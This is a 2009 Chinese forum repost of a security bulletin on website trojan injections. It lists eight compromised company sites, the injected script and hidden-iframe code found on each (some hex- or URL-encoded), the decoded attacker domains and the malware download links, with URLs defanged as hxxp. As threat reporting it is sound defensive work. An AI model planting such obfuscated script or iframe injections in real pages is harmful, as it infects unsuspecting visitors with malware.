2009年1月3日挂马简报

显示全部楼层 · 发表于 2009-1-3 17:39:22

原帖地址：http://www.scanw.com/blog/archives/306

1.上海全球通国际快递服务有限公司（www.guojikuaidi.com）多处被植入恶意代码：
<script language=”javascript” src=”hxxp://office2.viens.la/office.js?do=list&uid=193&type=blog” mce_src=”hxxp://office2.viens.la/office.js?do=list&uid=193&type=blog”></script>
通过漏洞攻击，最终下载病毒：
hxxp://www.67uy66.cn/1.css
hxxp://www.oiuytr.net/new/a266.css

2.光大空调（www.gdkongtiao.com）底部被植入恶意代码：
<script language=”javascript” src=”hxxp://office2.viens.la/office.js?do=list&uid=193&type=blog” mce_src=”hxxp://office2.viens.la/office.js?do=list&uid=193&type=blog”></script>
通过漏洞攻击，最终下载病毒：
hxxp://www.67uy66.cn/1.css
hxxp://www.oiuytr.net/new/a266.css

3.上海钮扣公司（www.lygms.cn）底部被植入恶意代码：
<script src=hxxp://%68%68%6A%32%2E%63%6E></script>
恶意链接地址解密后为：hxxp://hhj2.cn
通过漏洞攻击，最终下载病毒：
hxxp://d.ko546.com/down/360Safe.exe
hxxp://d.ko546.com/new/a1.css

4.珠海三木西机电制造有限公司（www.samce.net）底部被植入恶意代码：
<script src=hxxp://%68%68%6A%31%2E%63%6E></script>
<script src=hxxp://%76%76%6B%32%2E%63%6E></script>
<script src=hxxp://%68%68%6A%32%2E%63%6E></script>
<iframe src=hxxp://www.falaliqq.cn/b3.htm width=50 height=0 border=0></iframe>
恶意链接地址解密后为：
hxxp://hhj1.cn（失效）
hxxp://hhj2.cn
hxxp://vvk2.cn
hxxp://www.falaliqq.cn/b3.htm
通过漏洞攻击，最终下载病毒：
hxxp://d.ko546.com/down/360Safe.exe
hxxp://d.ko546.com/new/a1.css

5.重庆物流培训网（www.wuliupx.com）多处被植入恶意代码：
<script src=hxxp://www.google-analytics.tw.cn/show_ads.js></script>
通过漏洞攻击，最终下载病毒：
hxxp://qq.18i16.net/exe1/ce.css
hxxp://qq.18i16.net/exe1/ms.css
hxxp://qq.18i16.net/exe1/b11.css
hxxp://qq.18i16.net/exe1/bf.css
hxxp://qq.18i16.net/exe1/re.css
hxxp://121.12.173.218/exe1/cx.css
hxxp://qq.18i16.net/sina.css
hxxp://qq.18i16.net/baidu.cab

6.广州市红白蓝市内快递有限公司（www.kd56.com）底部被植入恶意代码：
<script>document.writeln(”\x3c\x73\x63\x72\x69\x70\x74\x20\x73\x72\x63\x3d\x68\x74\x74\x70\x3a\x2f\x2f\x4f\x25\x36\x36\x25\x36\x36\x25\x34\x39\x25\x36\x33\x65\x25\x32\x45\x25\x34\x36\x25\x34\x31\x51\x25\x35\x33\x25\x36\x35\x25\x37\x32\x76\x2e\x25\x34\x33\x25\x36\x46\x25\x34\x44\x2f\x25\x34\x36\x25\x34\x31\x25\x35\x31\x25\x32\x45\x25\x36\x41\x25\x37\x33\x3e\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e”);</script>
<script language=”javascript” src=”hxxp://conn1.sarl.tk/click.js?bgcr=ffffff&urlcr=0000ff&tbsz=260&sropls=1″ mce_src=”hxxp://conn1.sarl.tk/click.js?bgcr=ffffff&urlcr=0000ff&tbsz=260&sropls=1″></script>
恶意链接地址解密后为：
hxxp://OffIce.FAQServ.CoM/FAQ.js（失效）
hxxp://conn1.sarl.tk/click.js?bgcr=ffffff&urlcr=0000ff&tbsz=260&sropls=1
通过漏洞攻击，最终下载病毒：
hxxp://www.67uy66.cn/1.css
hxxp://www.oiuytr.net/new/a266.css

7.飞哥快递（www.fgkd.com.cn）多处被植入恶意代码：
<script language=”javascript” src=”hxxp://office2.viens.la/office.js?do=list&uid=193&type=blog” mce_src=”hxxp://office2.viens.la/office.js?do=list&uid=193&type=blog”></script>
通过漏洞攻击，最终下载病毒：
hxxp://www.67uy66.cn/1.css
hxxp://www.oiuytr.net/new/a266.css

8.上海柏意酒店设备用品制造有限公司（www.baye.cn）顶部及底部多处被植入恶意代码：
<iframe src=hxxp://www.wrmfwi.cn/b3.htm width=50 height=0 border=0></iframe>
<script src=hxxp://%75%69%6E%31%2E%63%6E></script>
<iframe src=hxxp://www.wrmfwu.cn/b3.htm width=50 height=0 border=0></iframe>
<iframe src=hxxp://www.wrmfww.cn/b3.htm width=50 height=0 border=0></iframe>
<script src=hxxp://%75%69%6E%32%2E%63%6E></script>
<iframe src=hxxp://www.hryspap.cn/b3.htm width=50 height=0 border=0></iframe>
<iframe src=hxxp://www.cznylsf.cn/b3.htm width=50 height=0 border=0></iframe>
<script src=hxxp://%75%69%6E%33%2E%63%6E></script>
<script src=hxxp://%75%69%6E%34%2E%63%6E></script>
<script src=hxxp://%75%69%6E%35%2E%63%6E></script>
<script src=hxxp://%63%63%68%31%2E%63%6E></script>
<script src=hxxp://%63%63%68%32%2E%63%6E></script>
<script src=hxxp://%76%76%6B%31%2E%63%6E></script>
<script src=hxxp://%76%76%6B%32%2E%63%6E></script>
<script src=hxxp://%68%68%6A%32%2E%63%6E></script>
<iframe src=hxxp://www.falaliqq.cn/b3.htm width=50 height=0 border=0></iframe>
恶意链接地址解密后为：
hxxp://uin3.cn
hxxp://www.cznylsf.cn/b3.htm
hxxp://uin4.cn
hxxp://uin5.cn
hxxp://cch1.cn
hxxp://cch2.cn
hxxp://vvk1.cn
hxxp://hhj1.cn
hxxp://vvk2.cn
hxxp://www.falaliqq.cn/b3.htm
hxxp://www.wrmfwi.cn/b3.htm
hxxp://www.wrmfwu.cn/b3.htm
hxxp://www.wrmfww.cn/b3.htm
hxxp://www.hryspap.cn/b3.htm
通过漏洞攻击，最终下载病毒：
hxxp://d.ko546.com/down/360Safe.exe
hxxp://d.ko546.com/new/a1.css

显示全部楼层 · 发表于 2009-1-3 17:45:25

[可疑文件] 2009年1月3日挂马简报

评分

本帖子中包含更多资源